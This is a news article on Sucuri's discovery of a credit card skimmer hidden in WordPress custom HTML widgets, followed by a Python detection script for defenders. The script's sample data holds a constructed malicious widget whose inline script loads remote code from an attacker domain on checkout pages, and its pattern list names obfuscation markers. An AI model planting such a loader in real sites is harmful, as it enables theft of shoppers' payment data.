- Sucuri finds malicious code embedded in WordPress sites
- The code collects and extracts payment information from e-commerce websites.
- Researchers warn WordPress site administrators to inspect all custom code
Cybercriminals are once again attacking WordPress websites with credit card skimmers, stealing victims’ sensitive payment information in the process.
This time, the company sounding the alarm is Sucuri, whose researcher Puja Srivastava recently published new analysis of the attack, noting that criminals are targeting WordPress e-commerce websites by inserting malicious JavaScript code into a database table associated with the content management system (CMS).
This script activates the credit card skimmer just as the victim is about to enter payment information.
“The malware activates specifically on payment pages, either by hijacking existing payment fields or by injecting a fake credit card form,” the researcher said.
The unnamed skimmer was created to steal all payment information necessary for online transactions: credit card numbers, expiration dates, CVV numbers, and billing information.
Cybercriminals often use stolen credit card information to fund malicious advertising campaigns on social media platforms, purchase malware or malware as a service (MaaS), or purchase gift cards as they are difficult to trace.
Sucuri added that the skimmer can also capture data entered on legitimate payment screens in real time, thus maximizing compatibility.
All acquired information is encoded in Base64 and encrypted with AES-CBC so that it blends in with normal traffic, and is then exfiltrated to a server under the attacker’s control (either “valhafather[.]xyz” or “fqbe23[.]xyz”).
To remove the malware, Sucuri suggests inspecting all custom HTML widgets. This can be done by logging into the WordPress admin panel, navigating to wp-admin > Appearance > Widgets and checking all custom HTML block widgets for suspicious or unknown tags. The researchers also suggested mitigation measures, including regular updates, managing administrator accounts, monitoring file integrity, and running a web application firewall.
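The manual widget review above can be scripted. The Python check below is an added example, not code from Sucuri or from the article: it takes a mapping of widget id to that widget's HTML (which you would export yourself from the widget_custom_html or widget_block options, for instance with WP-CLI's `wp option get`) and flags the markers the analysis describes: an inline script tag, atob()/Base64 decoding, and the two exfiltration hosts, including when a host is hidden inside a Base64 literal. The widget contents are constructed sample data.

```python
import base64
import re

# Exfiltration hosts named in the Sucuri write-up above (kept in defanged form).
KNOWN_EXFIL_DOMAINS = ["valhafather[.]xyz", "fqbe23[.]xyz"]

# A custom HTML widget should hold static markup; these markers point at injected script.
SUSPICIOUS_PATTERNS = {
    "script_tag": re.compile(r"<script\b", re.I),
    "base64_decode": re.compile(r"\batob\s*\(", re.I),
    "dynamic_eval": re.compile(r"\b(eval|Function)\s*\(", re.I),
    "charcode_obfuscation": re.compile(r"fromCharCode", re.I),
}
ATOB_LITERAL = re.compile(r"atob\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)")


def decoded_atob_literals(html):
    """Decode string literals passed to atob() so hosts hidden in Base64 can be matched."""
    out = []
    for m in ATOB_LITERAL.finditer(html):
        try:
            out.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError: skip literals that are not Base64
            continue
    return out


def scan_widget_html(widget_id, html):
    """Return the indicators found in one widget's HTML (empty list means nothing flagged)."""
    hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(html)]
    searchable = html + " " + " ".join(decoded_atob_literals(html))
    hits += [f"known_domain:{d}" for d in KNOWN_EXFIL_DOMAINS if d.replace("[.]", ".") in searchable]
    return {"widget": widget_id, "indicators": hits}


def scan_widgets(widgets):
    """widgets: {widget_id: html}. Returns only the widgets that carry at least one indicator."""
    return [r for r in (scan_widget_html(w, h) for w, h in widgets.items()) if r["indicators"]]


# Constructed sample data (not real site content): a benign widget and one carrying a
# checkout-only loader whose URL is Base64-encoded, mirroring the behaviour described above.
_LOADER_URL_B64 = base64.b64encode(b"https://fqbe23.xyz/loader.js").decode()
SAMPLE_WIDGETS = {
    "custom_html-2": '<p>Free shipping on orders over $50.</p><a href="/returns">Returns policy</a>',
    "custom_html-7": (
        '<div class="note">Thanks for shopping with us</div>'
        '<script>if(location.pathname.indexOf("checkout")!==-1){'
        'var s=document.createElement("script");s.src=atob("' + _LOADER_URL_B64 + '");'
        'document.head.appendChild(s);}</script>'
    ),
}
```

Calling `scan_widgets(SAMPLE_WIDGETS)` flags only `custom_html-7`, with the script tag, the atob() call and the decoded fqbe23 host as its indicators; a hit on any of these is reason to pull the widget from the database and compare it against a known-good backup.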
Skimmers seem to be gaining popularity again. Less than three weeks ago, the European Space Agency was found to be hosting this type of malicious code, which stole payment data, including sensitive credit card information, from countless victims.
Via The Hacker News